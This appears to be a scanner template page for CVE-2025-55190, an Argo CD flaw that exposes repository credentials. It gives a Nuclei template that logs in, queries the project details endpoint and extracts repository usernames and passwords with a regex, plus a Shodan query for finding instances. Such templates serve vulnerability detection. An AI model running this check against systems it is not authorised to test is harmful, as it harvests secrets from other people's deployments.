ArgoCD Project API Token Repository Credentials Exposure
CVE-2025-55190
Early Release
Description
Argo CD API tokens with project-level permissions are able to retrieve sensitive repository credentials (usernames, passwords) through the project details API endpoint, even when the token only has standard application management permissions and no explicit access to secrets. This vulnerability affects versions v2.2.0-rc1 and later, including 2.13.0 through 2.13.8, 2.14.0 through 2.14.15, 3.0.0 through 3.0.12, and 3.1.0-rc1 through 3.1.1. Any token with project get permissions is vulnerable, including global permissions. Note: This template requires valid ArgoCD credentials (username/password) to test the vulnerability.
Severity
Critical
CVSS Score
9.9
Exploit Probability
5%
Published Date
September 18, 2025
Template Author
nukunga[seunghyeonjeon]
CVE-2025-55190.yaml
id: CVE-2025-55190
info:
name: ArgoCD Project API Token Repository Credentials Exposure
author: nukunga[seunghyeonJeon]
severity: critical
description: |
Argo CD API tokens with project-level permissions are able to retrieve sensitive repository credentials
(usernames, passwords) through the project details API endpoint, even when the token only has standard
application management permissions and no explicit access to secrets. This vulnerability affects versions
v2.2.0-rc1 and later, including 2.13.0 through 2.13.8, 2.14.0 through 2.14.15, 3.0.0 through 3.0.12,
and 3.1.0-rc1 through 3.1.1. Any token with project get permissions is vulnerable, including global permissions.
Note: This template requires valid ArgoCD credentials (username/password) to test the vulnerability.
reference:
- https://github.com/argoproj/argo-cd/security/advisories/GHSA-786q-9hcg-v9ff
- https://nvd.nist.gov/vuln/detail/CVE-2025-55190
- https://github.com/argoproj/argo-cd/commit/e8f86101f5378662ae6151ce5c3a76e9141900e8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2025-55190
epss-score: 0.05296
epss-percentile: 0.89548
cwe-id: CWE-200
metadata:
verified: true
max-request: 2
shodan-query: http.title:"argo cd"
tags: cve,cve2025,argocd,credentials,exposure,gitops,kubernetes
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /api/v1/session HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{username}}","password":"{{password}}"}
extractors:
- type: json
name: token
part: body
internal: true
json:
- '.token'
- raw:
- |
GET /api/v1/projects/default/detailed HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}
Content-Type: application/json
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"repositories":'
- '"username":'
- '"password":'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: exposed_credentials
part: body
group: 1
regex:
- '"repositories":\[.*?"username":"([^"]+)".*?"password":"([^"]+)"'
# digest: 4a0a004730450221008f5ce6ee168b2bf9ee0124fdedead6f20ed81977f3213f016f45d7952b21cd89022011fa64166d8a1fbecc363a77e7a4b86fb9c2c898ee568b6123e7d12740804421:922c64590222798bb761d5b6d8e729509.9Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-55190
CWE ID:
cwe-200